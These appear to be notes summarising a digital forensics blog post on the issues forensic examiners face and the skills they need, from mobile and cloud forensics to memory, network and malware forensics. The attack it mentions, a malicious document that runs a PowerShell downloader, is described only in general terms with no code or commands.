Technical Skill

Summer: https://www.digitalforensics.com/blog/skill-and-knowledge-in-digital-forensics/

The issues facing computer forensics examiners can be broken down  into three broad categories: technical, legal and administrative.

Technical issues
Encryption
Increasing storage space
New technologies
Anti-forensics
 

Forensics are critically important to the incident response process  and are useful for both routine and timely response. For example, in an  incident where a company is dealing with a successful phishing attack,  forensic processes can be used to establish facts such as who clicked on the link, who was successfully phished/compromised, and what  information was actually accessed or taken. Computer forensics has become its own area of scientific expertise, with accompanying coursework and certification.

What knowledge and skills should a digital examiner have?

• Mobile forensics. There are a lot of mobile devices around. Luckily for digital  examiners, the war between developers of mobile device operating systems is ended. Now 99% of mobile devices are running iOS or Android OS.  Knowledge of the forensic artifacts of just two mobile operating systems allows a digital examiner to explore a vast number of mobile devices.  Mobile devices store a lot of private data about their owners. This can  be used to investigate crimes. Also, some mobile devices are vulnerable  to a virus attack despite actions taken by the developers, which can  lead to theft by private data hackers. There are several good tools for  extracting and analyzing data from mobile devices, but manual analysis  will result in detection of more forensic artifacts on the analyzed  device.
• Cloud Forensics. The cloud concept is very convenient for users. You can access your  private information or working documents from anywhere in the world. Do  not worry that a hard drive in a laptop or a desktop may break or that  priceless family photos will become inaccessible in a broken smartphone. Many cloud services allow the user to copy all of his information and  files to his local PC or a laptop for free. Exploring the artifacts of  cloud services on the owner’s devices lets you understand what files  were uploaded or downloaded to or from a cloud and other information  about the use of cloud services and the data in the clouds.
• Drone Forensics. Every day, more and more drones are used in everyday life.  Investigating information extracted from drones will soon become a routine job for digital examiners. We already see the use of encryption  to protect data in the memory of drones and the use of cloud services  for storing  information necessary for a drone’s  successful  functioning.
• Windows Forensics. The vast majority of PCs and laptops are running Windows OS. Also,  companies often use a server running Windows OS. Researchers constantly  report the discovery of new artifacts that can be used in a forensic  analysis. Therefore, knowledge of Windows Forensics is fundamental to  any digital examiner.
• Mac Forensics. Of course, the number of Mac computer owners varies from country to  country, but the general trend is that the number of Macs falling into  digital forensic laboratories is increasing. Knowledge in Mac Forensics  will allow a digital examiner to successfully explore similar devices.
• File Systems Forensics. There are not many basic file systems. These are: EXT, FAT, NTFS, HFS +. Knowledge of what kind of artifacts remain in the file systems is  needed in Windows Forensics, Incident Response, Data Recovery and Mobile Forensics.
• Incident Response. There are a lot of tools on the internet for hackers and penetration  testers. These tools allow you to automate the routine work of  attackers. Therefore, the number of incidents associated with the theft  of money, private or financial information is constantly increasing. The demand for digital examiners with Incident Response skills is  constantly growing.
• Memory Forensics. This is a specific area of ​​knowledge that a digital examiner will not use on a day-to-day basis. However, knowledge in Memory Forensics  allows significantly faster Incident Response, detection of  malware,  decrypting of drives and partitions. The examiner can retrieve other  data and files that are stored in the RAM of the device under test.
• Network Forensics. This allows detection of anomalies in the operation of computer  networks and detection of an intruder. It is also used in dynamic analysis of malware.
• Cyber ​​Tread Intelligence. Hackers and pentesters can use a huge number of methods to penetrate  an attacked computer or computer network. Knowledge of Cyber ​​Tread  Intelligence allows the examiner to separate several most likely methods of attack from a whole variety of methods. This allows you to reduce  response time to an incident and identify all compromised computers and  other devices (for example, routers).
• Malware Forensics. Of course, a digital examiner does not have the same skills as a  malware analyst. However, the knowledge of a digital examiner should  suffice to understand which of the viruses participated in the incident  (usually a compromised system contains several viruses) and understand  how the attack was carried out on a compromised system. For example, a typical attack on a computer looks like this: an email with a malicious  document arrives at the email address of the owner of the computer. When someone tries to open this document, it runs the powershell script that downloads an executable file (a virus). In order to understand how the  incident happened and what happened on the compromised computer,  knowledge in Malware Forensics is needed.